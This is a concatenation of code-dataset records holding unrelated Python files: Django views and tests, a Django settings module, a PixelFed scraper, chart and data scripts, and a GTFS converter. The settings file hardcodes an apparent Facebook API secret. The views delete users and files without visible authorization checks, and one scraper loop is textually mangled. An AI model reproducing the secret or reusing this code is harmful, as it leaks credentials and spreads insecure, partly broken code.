(authlist['id'][0:6]==\"_fake_\"):\n filename_id = File.objects.get(filename=authlist['id']).id\n print(filename_id)\n File_User.objects.create(auth=1,username_id=id, filename_id=filename_id, time=authlist['limit'],timeLimit=authlist['timeLimit'])\n else:\n File_User.objects.create(auth=1,username_id=id, filename_id=authlist['id'], time=authlist['limit'],timeLimit=authlist['timeLimit'])\n else:\n File_User.objects.create(auth=1,username_id=id, filename_id=authFileList['id'], time=authFileList['limit'],timeLimit=authFileList['timeLimit'])\n except Exception as e:\n success = False\n Data = str(e)\n #把auth权限还原成1\n return JsonResponse({\"success\": success, \"data\": Data})\n\ndef getUser(request):\n if request.method ==\"POST\":\n try:\n success = True\n id = json.loads(request.body)['userId']\n userInfo = User.objects.get(id=id)\n username = userInfo.username\n email = userInfo.email\n createDate = userInfo.createDate\n authFileList = []\n FileList = File_User.objects.filter(username_id=id)\n\n print(1)\n if isinstance(FileList, Iterable) == True:\n for authlist in FileList:\n filename_id = authlist.filename_id\n time = authlist.time\n timeLimit = authlist.timeLimit\n fakename = File.objects.get(id=filename_id).filename\n if fakename[0:6]==\"_fake_\":\n if time is not None:\n if timeLimit is not None:\n jsonArray = {\"id\": fakename, 
\"limit\": float(time),\"timeLimit\":int(timeLimit)}\n else:\n jsonArray = {\"id\": fakename, \"limit\": float(time), \"timeLimit\": timeLimit}\n else:\n if timeLimit is not None:\n jsonArray = {\"id\": fakename, \"limit\": time,\"timeLimit\":int(timeLimit)}\n else:\n jsonArray = {\"id\": fakename, \"limit\": time, \"timeLimit\": timeLimit}\n else:\n jsonArray = {\"id\": str(filename_id), \"limit\": float(time),\"timeLimit\":int(timeLimit)}\n authFileList.append(jsonArray)\n print(3)\n Data = {\"username\": username, \"email\": email, \"createDate\": createDate,\n \"limit\": userInfo.authTime, \"authFileList\": authFileList}\n else:\n filename_id = FileList.filename_id\n time = FileList.time\n timeLimit = FileList.timeLimit\n fakename = File.objects.get(id=filename_id).filename\n if fakename[0:6] == \"_fake_\":\n jsonArray = {\"id\": fakename, \"limit\": float(time),\"timeLimit\":int(timeLimit)}\n else:\n jsonArray = {\"id\": str(filename_id), \"limit\": float(time),\"timeLimit\":int(timeLimit)}\n authFileList.append(jsonArray)\n Data = {\"username\":username,\"email\":email,\"createDate\":createDate,\"limit\":userInfo.authTime,\"authFileList\":authFileList}\n print(4)\n print(5)\n return JsonResponse({\"success\": success, \"data\": Data})\n # except:\n # Data = {\"username\": username, \"email\": email, \"createDate\": createDate, \"limit\": userInfo.authTime,\"authFileList\": authFileList}\n # print(2)\n # return JsonResponse({\"success\": success, \"data\": Data})\n except Exception as e:\n success = False\n Data = str(e)\n return JsonResponse({\"success\": success, \"data\": Data})\n\ndef getFile(request):\n if request.method ==\"POST\":\n try:\n success = True\n id = int(json.loads(request.body)['fileId'])\n fileInfo = File.objects.get(id=id)\n title = fileInfo.filename\n content = fileInfo.content\n createDate = fileInfo.createDate\n type = fileInfo.type\n src = fileInfo.src\n print(type)\n authUserList = []\n token = request.COOKIES[\"token\"]\n # print(token)\n tokenInfo = Token.objects.get(Token=token)\n userid = tokenInfo.username_id\n\n if (User.objects.get(id=userid).isManager == False):\n #判断有无权限\n timeLimitdd = File_User.objects.get(username_id=userid, filename_id=id).timeLimit\n try:\n FileList = File_User.objects.get(username_id=userid, filename_id=id)\n except:\n return JsonResponse({\"success\": False, \"data\": \"You can`t open this file\"})\n #判断父文件夹有无全新啊\n File_User.objects.filter(username_id=userid, filename_id=id).update(auth=0)\n thisUserFile = File.objects.get(id=id) #取出文件\n thisGroup = thisUserFile.group\n try:\n thisFakeFile = File.objects.get(filename__contains='fake', group=thisGroup)\n fakeid = thisFakeFile.id\n limit = File_User.objects.get(filename_id=fakeid, username_id=userid).time\n timeLimit = File_User.objects.get(filename_id=fakeid, username_id=userid).timeLimit\n except:\n limit = File_User.objects.get(filename_id=id,username_id=userid).time\n timeLimit = File_User.objects.get(filename_id=id, username_id=userid).timeLimit\n if limit is None and timeLimit is None:\n limit = File_User.objects.get(filename_id=id, username_id=userid).time\n timeLimit = File_User.objects.get(filename_id=id, username_id=userid).timeLimit\n if type == \"pdf\" or type == \"PDF\" or type == \"DOCX\" or type == \"docx\" or type == \"DOC\" or type == \"doc\":\n list = src.split(\"/\")\n totalPage = PdfFileReader(open(list[3], \"rb\")).numPages\n timepage = int(math.ceil(float(limit)*totalPage))\n inputpdf = PdfFileReader(open(list[3], \"rb\"))\n output = PdfFileWriter()\n for i 
in range(timepage):\n output.addPage(inputpdf.getPage(i))\n pagesrc = src+\"-page%s.pdf\" % (timepage)\n print(pagesrc)\n list = pagesrc.split(\"/\")\n with open(list[3], \"wb\") as outputStream: #页码\n output.write(outputStream)\n print(\"生成成功\")\n src = pagesrc\n try:\n # if type==\"pdf\":\n # Fileinfo = File_User.objects.filter(filename_id=id)\n # if isinstance(Fileinfo, Iterable) == True:\n # for authlist in Fileinfo:\n # username_id = authlist.username_id\n # time = authlist.time\n # timepage = math.ceil(time) # 向上取证\n # page = '-page' + str(int(timepage))+'.pdf'\n # jsonArray = {\"id\": str(username_id), \"limit\": float(time)}\n # authUserList.append(jsonArray)\n # src = src + page\n # print(src)\n # else:\n # print(2)\n # username_id = Fileinfo.username_id\n # time = Fileinfo.time\n # authUserList = [{\"id\": str(username_id), \"limit\": float(time)}]\n\n Fileinfo = File_User.objects.filter(filename_id=id)\n if isinstance(Fileinfo, Iterable) == True:\n for authlist in Fileinfo:\n username_id = authlist.username_id\n time = authlist.time\n timeLimit = authlist.timeLimit\n jsonArray = {\"id\":str(username_id), \"limit\":float(time),\"timeLimit\":int(timeLimit)}\n authUserList.append(jsonArray)\n print(1)\n else:\n print(2)\n username_id = Fileinfo.username_id\n time = Fileinfo.time\n timeLimit = FileList.timeLimit\n authUserList = [{\"id\": str(username_id), \"limit\":float(time),\"timeLimit\":int(timeLimit)}]\n Data = {\"id\":str(id),\"title\":title,\"content\":content,\"src\":src,\"createDate\":createDate,\"type\":type,\"authUserList\":authUserList,\"limit\":float(limit),\"timeLimit\":int(timeLimitdd)}\n print(\"普通账户\")\n print(limit)\n except Exception as e:\n # print(3)\n # success = False\n # Data = str(e)\n print(\"error\")\n time = FileList.time\n Data = {\"id\": str(id), \"title\": title, \"content\": content, \"src\": src, \"createDate\": createDate,\"type\":type,\n \"authUserList\": authUserList,\"limit\":math.ceil(float(limit)),\"timeLimit\":int(timeLimitdd)}\n if (User.objects.get(id=userid).isManager == True):\n limit = 1\n Fileinfo = File_User.objects.filter(filename_id=id)\n if isinstance(Fileinfo, Iterable) == True:\n for authlist in Fileinfo:\n username_id = authlist.username_id\n time = authlist.time\n timeLimit = authlist.timeLimit\n jsonArray = {\"id\":str(username_id), \"limit\":float(time),\"timeLimit\":timeLimit}\n authUserList.append(jsonArray)\n print(1)\n else:\n print(2)\n username_id = Fileinfo.username_id\n time = Fileinfo.time\n timeLimit = Fileinfo.timeLimit\n authUserList = [{\"id\": str(username_id), \"limit\": float(time),\"timeLimit\":timeLimit}]\n Data = {\"id\": str(id), \"title\": title, \"content\": content, \"src\": src, \"createDate\": createDate,\n \"type\": type, \"authUserList\": authUserList, \"limit\": math.ceil(float(limit)),\"timeLimit\":999999}\n print(\"管理员账户\")\n print(limit)\n except Exception as e:\n success = False\n Data = str(e)\n return JsonResponse({\"success\": success, \"data\": Data})\n\ndef deleteUser(request):\n if request.method ==\"POST\":\n Data = []\n try:\n success = True\n id = json.loads(request.body)['id']\n User.objects.filter(id = id).delete()\n except Exception as e:\n success = False\n Data = str(e)\n return JsonResponse({\"success\": success, \"data\": Data})\n\ndef deleteFile(request):\n if request.method ==\"POST\":\n Data=[]\n try:\n success = True\n id = json.loads(request.body)['id']\n file = File.objects.get(id=id)\n list = file.src.split(\"/\")\n File.objects.filter(id=id).delete()\n if file.type == 
\"pdf\":\n filenames = glob.glob(list[3]+'*')\n for filename in filenames: os.remove(filename)\n else:\n os.remove(list[3])\n except Exception as e:\n success = False\n Data = str(e)\n return JsonResponse({\"success\": success, \"data\": Data})\n\n\ndef logout(request):\n if request.method ==\"GET\":\n Data=[]\n try:\n success = True\n\n resp = JsonResponse({\"success\": success, \"data\": Data}, safe=False)\n resp.delete_cookie('token')\n resp.delete_cookie('isManager')\n return resp\n except Exception as e:\n success = False\n Data = str(e)\n return JsonResponse({\"success\": success, \"data\": Data})\n\n\ndef arrayIntochar(array):\n # char = array.join(\"|\")\n char = ','.join(array)\n return char\n\ndef charIntoarray(char):\n if char == \"\":\n return []\n array = char.split(\",\")\n return array\ndef postFileList(request):\n if request.method ==\"POST\":\n Data=[]\n try:\n success = True\n arrays = json.loads(request.body)\n # for array in arrays:\n # id = array['id']\n # if (id[0:6]==\"_fake_\"):\n # File.objects.filter(filename__contains=\"_fake_\").delete() #一检测到就删除然后跳出循环\n # continue\n for array in arrays:\n id = array['id']\n group = array['group']\n if (id[0:6]==\"_fake_\"):\n fakeinfo = File.objects.filter(filename__contains=\"_fake_\")\n result = 0\n for fake in fakeinfo: #防止重复\n oldgroup = fake.group\n if (oldgroup==arrayIntochar(group)):\n result = 1\n continue\n if (result ==1):\n continue\n filename = \"_fake_\"+hash_code(str(datetime.datetime.now()))\n File.objects.create(filename=filename,group=arrayIntochar(group),createDate=datetime.datetime.now(),type=\"folder\")\n #更新权限表的问题\n filename_id = File.objects.all().order_by('-id')[0].id\n print(filename_id)\n Userinfo = User.objects.all()\n for authlist in Userinfo:\n File_User.objects.create(filename_id=filename_id,username_id=authlist.id) #创建文件夹权限表\n\n else:\n File.objects.filter(id=id).update(group=arrayIntochar(group)) #group全量更新\n except Exception as e:\n success = False\n Data = str(e)\n return JsonResponse({\"success\": success, \"Data\":Data})\n\ndef deleteFolder(request):\n if request.method ==\"POST\":\n Data=[]\n try:\n success = True\n infos = json.loads(request.body)\n for info in infos:\n id = info['id']\n print(id)\n file = File.objects.get(filename=id)\n File_User.objects.filter(filename_id=file.id).delete()\n File.objects.filter(filename=id).delete()\n except Exception as e:\n success = False\n Data = str(e)\n return JsonResponse({\"success\": success, \"data\": Data})\n","sub_path":"Project/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":48571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"343257420","text":"import os\nimport csv\nimport pygal\nlis = []\nusecal = 5\ndef openfile():\n with open('csvfile/job.csv') as csvfile:\n file1 = csv.reader(csvfile)\n print('open Success')\n usefile(list(file1))\ndef usefile(file1):\n data1 = []\n xlabel = [i[0] for i in file1[1:]]\n for i in range(1, 5):\n head = file1[0][i]\n lisskill = [row[i] for row in file1[1:]]\n summ = list(map(lambda x: int(x.replace(',','')), lisskill))\n data1.append([head, summ])\n chart(data1, xlabel)\ndef chart(data, label):\n want = 10\n line_chart = pygal.StackedBar()\n line_chart.title = 'skill want top 10'\n line_chart.x_labels = label[:want]\n for i, j in data:\n line_chart.add(i, j[:want])\n 
line_chart.render_to_file('img/allskillwant2.svg')\nopenfile()","sub_path":"script/allskillwant.py","file_name":"allskillwant.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"601285908","text":"\nclass FullSqure(object):\n \"\"\"\n 求完全平方数\n \"\"\"\n def getFromZeroToMax(self, max_range:int=10000)->list:\n \"\"\"\n 求max_range 范围内的所有完全平方数\n \"\"\"\n res = []\n for i in range(max_range//2):\n if i*i <= max_range:\n res.append(i)\n\n return res\n \n def getFromMaxToZero(self,max_range:int=10000)->list:\n \"\"\"\n 求max_range内的所有完全平方数(从max开始进行开平方校验)\n \"\"\"\n res = []\n \n return res\n\n","sub_path":"full_squre/full_squre.py","file_name":"full_squre.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"556457003","text":"from django.test import Client, TestCase\nfrom django.contrib.auth.models import User\nfrom orders.models import *\n\n# Create your tests here.\n\nclass OrdersTestCase(TestCase):\n\n def setUp(self):\n user = User.objects.create_user(username='test_user', password='password')\n order = Order.objects.create(user=user)\n d = MenuDish.objects.create(name=\"dish\")\n mi1 = MenuItem.objects.create(name=\"plate\", dish=d)\n i1 = OrderItem.objects.create(item=mi1)\n\n\n def test_orders_page(self):\n user = User.objects.get(username='test_user')\n c = Client()\n c.force_login(user)\n response = c.get(\"/orders/\")\n self.assertEqual(response.status_code, 200)\n\n\n def test_order_page(self):\n user = User.objects.get(username='test_user')\n order = Order.objects.get(user=user)\n c = Client()\n c.force_login(user)\n response = c.get(f\"/orders/{order.id}\")\n self.assertEqual(response.status_code, 200)\n\n\n def test_new_order(self):\n user = User.objects.get(username='test_user')\n order = Order.objects.get(user=user)\n c = Client()\n c.force_login(user)\n\n response = c.get(f\"/orders/new\", follow=True)\n self.assertEqual(response.redirect_chain, [('/orders/1', 302)])\n\n order.paid = True;\n order.save()\n response = c.get(f\"/orders/new\", follow=True)\n self.assertEqual(response.redirect_chain, [('/orders/2', 302)])\n\n\n def test_choose_item(self):\n user = User.objects.get(username='test_user')\n order = Order.objects.get(user=user)\n c = Client()\n c.force_login(user)\n response = c.get(f\"/orders/choose_item\")\n self.assertEqual(response.status_code, 200)\n\n order.paid = True;\n order.save()\n response = c.get(f\"/orders/choose_item\", follow=True)\n self.assertEqual(response.redirect_chain, [('/orders/', 302)])\n\n\n def test_order_payment(self):\n user = User.objects.get(username='test_user')\n order = Order.objects.get(user=user)\n c = Client()\n c.force_login(user)\n response = c.post(f\"/orders/pay\", follow=True)\n self.assertEqual(response.redirect_chain, [('/orders/1', 302)])\n\n item = OrderItem.objects.get(id=1)\n order.items.add(item)\n response = c.post(f\"/orders/pay\", follow=True)\n order = Order.objects.get(user=user)\n self.assertTrue(order.paid)\n self.assertEqual(response.redirect_chain, [('/orders/', 302)])\n\n","sub_path":"orders/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"199159731","text":"import os\nimport tempfile\n\n# connect to mongo using settings defined in mongoconnection module\n# - this way it is completely independent 
of django's settings`\nfrom mongoconnection import connect\nconnect()\n\nTWEET_CRAWLER_URL = \"http://localhost:8081/\"\nTWEET_CRAWLER_TIMEOUT = 1\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\nJS_DEBUG = DEBUG\n\n_tempdir = tempfile.tempdir or '/tmp'\nROOT_DIR = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))\n\nADMINS = ()\nMANAGERS = ADMINS\nDATABASES = {}\n\nTIME_ZONE = 'Europe/Warsaw'\nLANGUAGE_CODE = 'en-us'\nSITE_ID = 1\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\n\nMEDIA_ROOT = ''\nMEDIA_URL = ''\nSTATIC_ROOT = os.path.join(ROOT_DIR, '..', 'collected_static')\n\nSTATIC_URL = '/static/'\n\n# Additional locations of static files\nSTATICFILES_DIRS = (\n os.path.join(ROOT_DIR, '..', 'static'),\n)\n\n# List of finder classes that know how to find static files in\n# various locations.\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder'\n)\n\n# Make this unique, and don't share it with anybody.\nSECRET_KEY = ''\n\n# List of callables that know how to import templates from various sources.\nTEMPLATE_LOADERS = (\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n 'django.template.loaders.eggs.Loader',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nROOT_URLCONF = 'citypulse.urls'\n\n# Python dotted path to the WSGI application used by Django's runserver.\nWSGI_APPLICATION = 'citypulse.wsgi.application'\n\nTEMPLATE_DIRS = (\n \"templates\",\n os.path.join(ROOT_DIR, '..', 'templates'),\n)\n\nCACHES = {\n 'default': {\n 'BACKEND': 'django.core.cache.backends.filebased.FileBasedCache',\n 'LOCATION': os.path.join(_tempdir, 'citypulse__file_based_cache'),\n }\n}\nSESSION_ENGINE = 'django.contrib.sessions.backends.cache'\n\nINSTALLED_APPS = (\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.admin',\n\n 'pipeline',\n 'south',\n 'bootstrap',\n\n 'citypulse.main',\n 'citypulse.clustering',\n 'citypulse.api',\n 'citypulse.fbcrawler',\n)\n\nSOUTH_TESTS_MIGRATE = False\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse'\n }\n },\n 'handlers': {\n 'mail_admins': {\n 'level': 'ERROR',\n 'filters': ['require_debug_false'],\n 'class': 'django.utils.log.AdminEmailHandler'\n }\n },\n 'loggers': {\n 'django.request': {\n 'handlers': ['mail_admins'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n }\n}\n\nPIPELINE_CSS = {\n 'bootstrap': {\n 'source_filenames': (\n 'less/bootstrap/bootstrap.less',\n 'less/base.less',\n ),\n 'output_filename': 'css/bootstrap.css',\n 'extra_context': {\n 'rel': 'stylesheet/less',\n },\n },\n 'bootstrap-responsive': {\n 'source_filenames': (\n 'less/bootstrap/responsive.less',\n ),\n 'output_filename': 'css/bootstrap-responsive.css',\n 'extra_context': {\n 'rel': 'stylesheet/less',\n },\n },\n\n}\n\nPIPELINE_JS = {\n 'main': {\n 'source_filenames': (\n 'js/main/init.js',\n 'js/maps/models.coffee',\n 'js/maps/views.coffee',\n 'js/markerclusterer.js',\n 'js/styledmarker.js',\n 
'js/maps/controller.coffee',\n 'js/main/initcontroller.js',\n ),\n 'output_filename': 'js/main.js'\n },\n 'core': {\n 'source_filenames': (\n 'js/jquery-1.7.2.js',\n 'js/ejs.js',\n 'js/view.js',\n 'js/underscore.js',\n 'js/json2.js',\n 'js/backbone.js',\n 'js/bootstrap.js',\n 'js/init.js',\n 'js/markerclusterer.js',\n ),\n 'output_filename': 'js/core.min.js',\n },\n 'less': {\n 'source_filenames': (\n 'js/less-1.3.0.js',\n ),\n 'output_filename': 'js/less.min.js',\n },\n}\n\nPIPELINE = not DEBUG\nif PIPELINE:\n STATICFILES_STORAGE = 'pipeline.storage.PipelineCachedStorage'\n\nPIPELINE_COMPILERS = (\n 'pipeline.compilers.coffee.CoffeeScriptCompiler',\n 'pipeline.compilers.less.LessCompiler',\n)\nPIPELINE_LESS_BINARY = \"lessc\"\nPIPELINE_YUI_BINARY = os.path.join(ROOT_DIR, '..', 'bin', 'yuicompressor.sh')\nPIPELINE_COFFEE_SCRIPT_BINARY = os.path.join(ROOT_DIR, '..', 'bin', 'coffeefinder.sh')\n\nPIPELINE_TEMPLATE_FUNC = 'new EJS'\nPIPELINE_TEMPLATE_NAMESPACE = 'window.Template'\nPIPELINE_TEMPLATE_EXT = '.ejs'\n\n\nFACEBOOK_API_KEY = '277478075671648'\nFACEBOOK_API_SECRET = 'a2a3e31634e0f62b9e618c398ce10033'\n","sub_path":"citypulse/settings/defaults.py","file_name":"defaults.py","file_ext":"py","file_size_in_byte":5262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"159297861","text":"# coding: utf-8\n\nimport urllib2\nimport re\nimport message_box\nfrom ast import literal_eval\n\nclass InfoExtractor():\n \"\"\" Extractor Information class for PixelFed\n\n PixelFed InfoExtractor that, given url, extract information about the\n image (or images) the URL refers to. This information includes the real\n image URL, the image title, author and others. The information is stored\n in a list of dictionary.\"\"\"\n\n def __init__(self, url, verbose) :\n self.url = url\n self.print_ = message_box.print_(verbose)\n self.hdr = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n 'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.3',\n 'Accept-Encoding': 'none',\n 'Accept-Language': 'en-US,en;q=0.8',\n 'Connection': 'keep-alive'}\n self.result_list = []\n self.raw_informations = None\n self.info_dictionary = {\n 'username' : None,\n 'author' : None,\n 'profile_url' : None,\n 'is_several_images' : False,\n 'id' : None,\n 'title' : None,\n 'format' : \".jpg\", #All images from instagram are jpg\n 'description' : None,\n 'comments' : None,\n 'date' : None,\n 'localization' : None,\n 'real_urls_and_dimensions' : [], # list of urls and dimensions(W-H),\n 'like_nb' : None,} # ex : [[\"url1\", 1080, 1080],[\"url2\", 640, 640]]\n\n def get_informations(self) :\n if self.get_type_link(self.url) == \"post\" :\n self.raw_informations = self.download_post_informations(self.url)\n self.get_information_single_image(self.raw_informations)\n elif self.get_type_link(self.url) == \"account\" :\n self.info_dictionary['is_several_images'] = True\n self.raw_informations, list_urls = self.download_account_informations(\n self.atom_link(self.url))\n self.get_information_many_images(self.raw_informations, list_urls)\n elif self.get_type_link(self.url) == \"undeterminate\" :\n return \"Error : Url is not valid\"\n return self.result_list\n\n def get_type_link(self, url) :\n \"\"\" Return type url from Instagram : many images (acount) or single image\n or undeterminate. 
The determination find in url.\"\"\"\n url_post_re = r\"(https|http):\\/\\/(\\w+\\.|)([a-zA-Z0-9_-]+)\\.(bzh|org|social|fr|com|net|ru|cc)/p/([a-zA-Z0-9_-]+)/(\\w+)\"\n url_account_re = r\"(https|http):\\/\\/(\\w+\\.|)([a-zA-Z0-9_-]+)\\.(bzh|org|social|fr|com|net|ru|cc)/(\\w+)$\"\n if re.match(url_post_re, url) is not None :\n return \"post\"\n elif re.match(url_account_re, url) is not None :\n return \"account\"\n else : return \"undeterminate\"\n\n def atom_link(self, url) :\n return re.sub(\n r\"(?P(https|http):\\/\\/(\\w+\\.|)([a-zA-Z0-9_-]+)\\.(bzh|org|social|fr|com|net|ru|cc)/)(?P([a-zA-Z0-9_-]+))\",\n r\"\\gusers/\\g.atom\",\n url)\n\n def download_post_informations(self, url) :\n \"\"\" Download the source code of webpage from a post-url.\n Return all webpage source code.\"\"\"\n request = urllib2.Request(url, headers=self.hdr)\n fh = urllib2.urlopen(request)\n source_code = fh.read()\n return source_code\n\n def download_account_informations(self, url) :\n \"\"\" Download the source code of webpage from an account-url.\n Return a list of source post-url pages.\"\"\"\n # Download feed webpage\n request = urllib2.Request(url, headers=self.hdr)\n fh = urllib2.urlopen(request)\n source_code = fh.read()\n # List the url of post\n List_of_posts_urls = []\n end = 0\n for i in range(source_code.count('\\n', start)\n List_of_posts_urls.append(source_code[start:end])\n # Download the post informations page\n List_informations = []\n for i, url in enumerate(List_of_posts_urls) :\n self.print_.dynamic([\"pixelfed\",\n url[url.rfind('/')+1:] if url[len(url)-1] != \"/\" else url[url[:-1].rfind('/')+1:-1],\n \"Downloading picture info webpage\",\n \"{0} of {1}\".format(i+1, len(List_of_posts_urls))])\n List_informations.append(self.download_post_informations(url))\n\n return List_informations, List_of_posts_urls\n\n def get_information_single_image(self, webpage_info) :\n \"\"\" Complete the dictionary with information of code source webpage.\n The result is locate in a list of result (result list) in the form\n of dictionary.\"\"\"\n self.info_dictionary['username'] = self.find_info(webpage_info, 'status-username=')\n self.info_dictionary['author'] = self.find_info(webpage_info, 'status-username=')\n self.info_dictionary['profile_url'] = self.find_info(webpage_info, 'status-avatar=')\n self.info_dictionary['id'] = self.find_info(webpage_info, 'status-id=')\n title, description = self.get_title_and_description(webpage_info)\n self.info_dictionary['title'] = title\n self.info_dictionary['description'] = description\n #self.info_dictionary['comments'] = \n #self.info_dictionary['localization'] = \n self.info_dictionary['real_urls_and_dimensions'].append(\n [self.find_info(webpage_info, '\": (0, +1)}\nfor y, line in enumerate(reversed(lines)):\n\tfor x, char in enumerate(line):\n\t\tif char in dirs:\n\t\t\tblizzards.append(Blizzard((y, x), dirs[char]))\n\t\t\tvalley[y][x] = 1\n\t\telif char == \"#\":\n\t\t\tvalley[y][x] = -1\n\npos_start = (h-1, valley[h-1].index(0))\npos_goal = (0, valley[0].index(0))\n\nprint(\n\treach_goal(pos_start, pos_goal, blizzards, valley) + \n\treach_goal(pos_goal, pos_start, blizzards, valley) + \n\treach_goal(pos_start, pos_goal, blizzards, valley)\n)\n","sub_path":"2022/day24/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":1513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"645380202","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n'''\r\nCreated on 2019年9月1日\r\ncreate unique id 
of user and author\r\n\r\n@author: Administrator\r\n'''\r\nimport pandas\r\nimport numpy\r\nfrom boltons.setutils import IndexedSet\r\n\r\ntrack1 = pandas.read_csv('../input/final_track1_train.txt', sep='\\t', iterator=True)\r\nprint(track1)\r\n\r\nidset = []\r\nLoop = True\r\nwhile Loop:\r\n try:\r\n track = track1.get_chunk(1e8).values\r\n track = track[:, [0, 3]]\r\n print(track)\r\n \r\n idset.append(numpy.unique(track.flatten()))\r\n \r\n except StopIteration:\r\n Loop = False\r\n print('stop iteration')\r\n\r\nids = numpy.unique(numpy.concatenate(idset)) \r\nprint(ids)\r\n\r\ntrack2 = pandas.read_csv('../input/final_track2_train.txt', sep='\\t').values\r\ntrack2 = track2[:, [0, 3]]\r\nprint(track2)\r\nids = numpy.unique(numpy.concatenate((track2.flatten(), ids)))\r\nnumpy.savez_compressed('../numpy/id.npz', id=ids)\r\nprint('done')\r\n\r\n","sub_path":"network/make.py","file_name":"make.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"163260193","text":"#!/usr/bin/python3\r\n# student: J.F.P. (Richard) Scholtens\r\n# studentnr.: s2956586\r\n# datum: 28/05/2019\r\n# This program restructures the pairCounts file to a more\r\n# efficient format. It does so by only storing the resources\r\n# with the highest frequency of anchors to a pickle file.\r\n\r\nimport pickle\r\n\r\n\r\ndef restructure(entity):\r\n \"\"\"Changes the spaces of the string into underscores and\r\n then capatalizes the string. It then returns the string.\"\"\"\r\n return entity.replace(\" \", \"_\").lower().capitalize()\r\n\r\n\r\ndef to_pickle(text_file):\r\n \"\"\"Opens a file wich is structured as following:\r\n ########################\r\n Entity TAB URL TAB Frequency\r\n ########################\r\n It then takes out all information which is seperated by tabs.\r\n After this it puts it in a dictionary where the entity is the key.\r\n The value holds a tuple with the resource URL and frequency.\"\"\"\r\n dic = {}\r\n with open(text_file, 'r') as f:\r\n for line in f.readlines():\r\n line = line.strip().split(\"\\t\")\r\n entity = restructure(line[0])\r\n try:\r\n if dic[entity]:\r\n val = dic[entity]\r\n if int(line[2]) > val[1]:\r\n dic[entity] = (line[1], line[2])\r\n except:\r\n dic[entity] = (line[1], int(line[2]))\r\n with open(text_file + '.pickle', 'wb') as f2:\r\n pickle.dump(dic, f2)\r\n\r\n\r\ndef main():\r\n to_pickle('pairCounts')\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"pairCounts_to_pickle.py","file_name":"pairCounts_to_pickle.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"284923948","text":"# -*- coding: iso-8859-15 -*-\n'''\nVISUM add-in Import Google Transit Feed\n\nDate: 22.05.2014\nAuthor: Dimitri Krutik\nContact: Dimitri.Krutik@ptvgroup.com\nCompany: PTV AG'''\n\nfrom datetime import date\nimport GoogleTransitImport.Operations as op\nfrom GoogleTransitImport import GoogleTransitExceptions as ex\nfrom GoogleTransitImport.Calendar import Period\nfrom GoogleTransitImport.TransitDataImporter.DataConverter.ConverterBase import ConverterBase\n\nclass CalendarPeriodConverter(ConverterBase):\n \"\"\"\n Parse the \"calendar.txt\" and \"calendar_dates.txt\" files.\n Determine the calendar period for service, form date - to date.\n Set the calendar period in worker.\n Create the valid days of service.\n \"\"\"\n\n # VISUM definitions\n __serviceAvailable = u'1'\n __serviceNotAvailable = 
u'0'\n\n # GoogleTransit definitions\n __serviceAdded = u'1'\n __serviceRemoved = u'2'\n\n __weekDays = [\"monday\", \"tuesday\", \"wednesday\", \"thursday\", \"friday\", \"saturday\", \"sunday\"]\n\n def __init__(self):\n super(CalendarPeriodConverter, self).__init__()\n self.__serviceIdToValidDaysVector = None\n self.__serviceIdToValidDaysVector = None\n self.__period = None\n self.__never = \"\"\n\n def _initializeDataForExecution(self, worker):\n super(CalendarPeriodConverter, self)._initializeDataForExecution(worker)\n self.__serviceIdToValidDaysVector = dict()\n\n def _resetLocalData(self):\n super(CalendarPeriodConverter, self)._resetLocalData()\n self.__serviceIdToValidDaysVector = None\n self.__period = None\n self.__never = \"\"\n\n def _checkRequiredFiles(self, worker):\n if worker.Files.calendarfile == None and worker.Files.datesfile == None:\n mess = _(\"The files '%s' and '%s' are missing. At least one of the files is required.\").decode(\"iso-8859-15\") % (worker.Files.CalendarFileName, worker.Files.DatesFileName)\n raise ex.RequiredFileMissed(mess)\n\n def _startConversion(self):\n message = _(\"Processing valid days\").decode(\"iso-8859-15\")\n self._worker.UpdateProgressDialog(message)\n\n self.__parseServiceDates()\n self.__saveServiceDates()\n\n def __parseServiceDates(self):\n self.__determineCalendarPeriod()\n self.__loadValidDays()\n\n def __saveServiceDates(self):\n 